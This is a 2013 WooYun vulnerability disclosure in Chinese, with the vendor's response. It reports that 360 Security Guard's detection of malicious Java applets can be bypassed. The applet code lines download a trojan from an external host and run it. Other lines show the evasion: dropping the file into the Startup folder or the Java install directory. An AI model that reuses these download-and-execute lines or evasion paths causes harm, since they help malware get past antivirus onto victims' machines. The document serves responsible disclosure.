360安全卫士jre Applet挂马检测缺陷以及简单方法绕过检测

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022686

漏洞标题：360安全卫士jre Applet挂马检测缺陷以及简单方法绕过检测

漏洞作者： shine

提交时间：2013-04-28 13:52

修复时间：2013-05-02 15:05

公开时间：2013-05-02 15:05

漏洞类型：设计错误/逻辑缺陷

危害等级：中

自评Rank：5

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-04-28：细节已通知厂商并且等待厂商处理中
2013-05-02：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT!

详细说明：

前几天不小心看360安全卫士有对jre漏洞挂马做拦截，所以想绕过，测试了一下！

//之前，有发过给你们邮箱，说附件太大没收到。发网盘后再发邮件给你们就没消息了，效率太低了，还是发乌云效率高点，看看是不是漏洞？漏洞赏金没有，看能不能刷点rank!
//之前邮件描述：
360安全卫士最近对jre漏洞浏览器Applet挂马攻击有做行为检测，如图：

但检测存在缺陷以及直接绕过情况，简单测试步骤（详细测试视频和其他相关文件及信息在附件）：
             1、如果直接下载，然后就运行木马就是上图的情况，被拦截：
 
             this.downLoad("http://127.0.0.1:8080/360.exe", "C:/Program Files/360.exe");//下载木马
             this.runFile("C:/Program Files/360.exe");//运行
 
            2、在第1步中，是下载木马到本地，然后运行会被拦截，检测规则是两部分相加流程的行为。但如果只下载木马，360却不会拦截，那如果木马下载到系统启动目录，也不拦截，就有点问题了，所以这是个比较严重的规则缺陷：
 
    this.downLoad("http://127.0.0.1:8080/360.exe", "C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/360.exe");//下载木马
 
           3、把木马下载到java安装目录，然后再运行，就直接绕过现有行为检测：
 
      this.downLoad("http://127.0.0.1:8080/360.exe", "C:/Program Files/Java/360.exe");//下载木马
      this.runFile("C:/Program Files/Java/360.exe");//运行
之前邮件附件的网盘地址：
http://pan.baidu.com/share/link?shareid=450929&uk=3961677986
密码：r0vm

漏洞证明：

//今天又做了另一个jre漏洞（CVE-2012-4681）同样方式测试，弄了个综合测试地址：
http://shinewooyun.duapp.com/

视频中简单过程测试代码：

//C:/Program Files/目录
             //    this.downLoad("http://shinewooyun.duapp.com/360.exe", "C:/Program Files/360.exe");//下载木马
	     //    this.runFile("C:/Program Files/360.exe");//运行
              //下载到java安装目录(jre运行目录)，运行木马，这一目录行为绕过拦截
             // this.downLoad("http://shinewooyun.duapp.com/360.exe", "C:/Program Files/Java/360.exe");//下载木马
	     // this.runFile("C:/Program Files/Java/360.exe");//运行
              //C:/目录
              this.downLoad("http://shinewooyun.duapp.com/360.exe", "C:/360.exe");//下载木马
	      this.runFile("C:/360.exe");//运行

视频网盘地址：
http://pan.baidu.com/share/link?shareid=453234&uk=3961677986
密码：2k9f

修复方案：

这应该是漏洞吧？

版权声明：转载请注明来源 shine@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-05-02 15:05

厂商回复：

非常感谢乌云白帽子shine的积极反馈和支持
根据该JAVA漏洞的影响范围和挂马利用情况，360木马防火墙目前仅提供了拦截可疑进程利用的防护功能（基于云端响应）。
并没有像针对“暴雷”、2013新年IE0day等漏洞一样提供深层的基于漏洞利用的防御功能，因此对您反馈的JAVA漏洞这类第三方漏洞的利用我们没有界定为安全防护缺陷。
未来我们会根据情况，考虑针对JAVA漏洞进一步加强防御功能，也欢迎乌云白帽子提出更多反馈意见。
另外，如果漏洞报告者对于360安全漏洞响应报告平台的初步处理结果存在异议的话，建议直接回复原邮件进行讨论。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022686

漏洞标题：360安全卫士jre Applet挂马检测缺陷以及简单方法绕过检测

相关厂商：奇虎360

漏洞作者： shine

提交时间：2013-04-28 13:52

修复时间：2013-05-02 15:05

公开时间：2013-05-02 15:05

漏洞类型：设计错误/逻辑缺陷

危害等级：中

自评Rank：5

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 shine@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022686

漏洞标题：360安全卫士jre Applet挂马检测缺陷以及简单方法绕过检测

相关厂商：奇虎360

漏洞作者： shine

提交时间：2013-04-28 13:52

修复时间：2013-05-02 15:05

公开时间：2013-05-02 15:05

漏洞类型：设计错误/逻辑缺陷

危害等级：中

自评Rank：5

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-022686"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 shine@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：